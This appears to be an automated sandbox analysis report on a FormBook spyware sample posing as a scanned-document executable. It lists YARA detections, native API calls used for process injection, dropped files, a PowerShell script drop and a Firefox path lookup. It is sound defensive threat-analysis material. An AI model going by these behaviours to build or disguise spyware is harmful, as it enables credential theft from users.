Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.884104159.0000000007B92000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.887209413.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\wscript.exe | Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogri.ini
Source: C:\Windows\SysWOW64\wscript.exe | Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrf.ini
Source: C:\Windows\SysWOW64\wscript.exe | Dropped file: C:\Users\user\AppData\Roaming\K-NOB87E\K-Nlogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416BC0 NtCreateFile
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416C70 NtReadFile
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416CF0 NtClose
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416DA0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416BBA NtCreateFile
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416C6A NtReadFile
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416C12 NtCreateFile
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code function: 5_2_00416CEA NtClose
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 20_2_02F62EF0 NtUnmapViewOfSection
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 20_2_02F64C41 NtUnmapViewOfSection
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416BC0 NtCreateFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416C70 NtReadFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416CF0 NtClose
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416DA0 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416BBA NtCreateFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416C6A NtReadFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416C12 NtCreateFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00416CEA NtClose
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA2D0 NtClose,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA240 NtReadFile,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA5F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA540 NtDelayExecution,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA720 NtResumeThread,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA750 NtCreateFile,LdrInitializeThunk
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBB0B0 NtGetContextThread
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA800 NtSetValueKey
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA2F0 NtQueryInformationFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBBA30 NtSetContextThread
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA220 NtWaitForSingleObject
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA260 NtWriteFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA3D0 NtCreateKey
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA310 NtEnumerateValueKey
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA370 NtQueryInformationProcess
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA350 NtQueryValueKey
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBACE0 NtCreateMutant
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA430 NtQueryVirtualMemory
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBB410 NtOpenProcessToken
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA470 NtSetInformationFile
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBB470 NtOpenThread
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA460 NtOpenProcess
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA5A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA520 NtEnumerateKey
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBBD40 NtSuspendThread
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA6D0 NtCreateProcessEx
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA650 NtQueueApcThread
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA780 NtOpenDirectoryObject
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_2_00BBA710 NtQuerySection
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: 21_1_00416BC0 NtCreateFile
Detected potential crypto function
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code functions: 4_2_010F0B08, 4_2_010F1FB0, 4_2_010F0E98, 4_2_010F22D8, 4_2_010F1414, 4_2_010F2051, 4_2_010F0F35, 4_2_010F0EF0
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Code functions: 5_2_004078F0, 5_2_0041B22A, 5_2_0041AB51, 5_2_0041B42A, 5_2_0041A4D7, 5_2_00419E3C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code functions: 17_2_00B7E698, 17_2_00B7E688, 17_2_00B7BCBC
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code functions: 20_2_02F622D8, 20_2_02F60E98, 20_2_02F61FA1, 20_2_02F60B08, 20_2_02F60EF0, 20_2_02F60F35, 20_2_02F62051, 20_2_02F61414
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code functions: 21_2_004078F0, 21_2_0041B22A, 21_2_0041AB51, 21_2_0041B42A, 21_2_0041A4D7, 21_2_00419E3C, 21_2_00C428E8, 21_2_00B8A080, 21_2_00BA48CB, 21_2_00C218B6, 21_2_00BAE020, 21_2_00BA0021, 21_2_00BA9810, 21_2_00BA1070, 21_2_00C3D016, 21_2_00C361DF, 21_2_00C419E2, 21_2_00BA6180, 21_2_00C4D9BE, 21_2_00BA7110, 21_2_00BC9906, 21_2_00BA594B, 21_2_00B942B0, 21_2_00C422DD, 21_2_00C41A99, 21_2_00BA523D, 21_2_00C30A02, 21_2_00C4E214, 21_2_00BA4A5B, 21_2_00BA4B96, 21_2_00B7EBE0, 21_2_00BA63C2, 21_2_00B9FB40, 21_2_00C3DCC5, 21_2_00C344EF, 21_2_00C33490, 21_2_00C41C9F, 21_2_00C42C9A, 21_2_00B91410, 21_2_00B8740C, 21_2_00BA547E, 21_2_00C2F42B, 21_2_00C3D5D2, 21_2_00C2FDDB, 21_2_00C21DE3, 21_2_00C3E581, 21_2_00C1E58A, 21_2_00B91530, 21_2_00C31D1B, 21_2_00C42519, 21_2_00B70D40, 21_2_00C1C53F, 21_2_00C426F8, 21_2_00C33E96, 21_2_00C3CE66, 21_2_00BA6611, 21_2_00BA5E70, 21_2_00BA4E61, 21_2_00B97640, 21_2_00C41FCE, 21_2_00B95790, 21_2_00C32782, 21_2_00B767D0, 21_2_00C41746
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: String function: 00BCDDE8 appears 48 times
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: String function: 00B7B0E0 appears 176 times
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Code function: String function: 00C05110 appears 38 times
PE file contains strange resources
Source: SKMBT 25032020 Ref- 0000019.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cookies7n1p8js.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name is different from the original file name gathered from version info
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799680679.0000000000202000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.826046931.0000000005B70000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.827347996.0000000005C60000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000000.00000002.799769107.0000000000397000.00000004.00000010.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.826583597.0000000000B32000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.825199884.0000000000436000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameReZer0V4.exe. vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000004.00000002.829222069.0000000001590000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000000.824272503.0000000000FD2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.928565433.0000000001B1F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe, 00000005.00000002.927343543.00000000019C0000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs SKMBT 25032020 Ref- 0000019.exe
Source: SKMBT 25032020 Ref- 0000019.exe | Binary or memory string: OriginalFilenamenqYa59zXUnmgY7b.exeD vs SKMBT 25032020 Ref- 0000019.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\wscript.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature match
Every source listed below matched both of the following rules:
Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY
Source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY
Source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY
Source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: SKMBT 25032020 Ref- 0000019.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Cookies7n1p8js.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains many API calls related to security
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0008u2000.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0008u2000.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, u0006u2000.cs | Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Classification label
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/21@41/7
Creates files inside the user directory
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | File created: C:\Users\Public\cAFdqNkr.ps1
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_01
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe | Mutant created: \Sessions\1\BaseNamedObjects\ASvyjsAiwyLTzwKn
Creates temporary files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jkjtrz3.fhh.ps1
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
PE file has an executable .text section and no other executable section
Source: SKMBT 25032020 Ref- 0000019.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
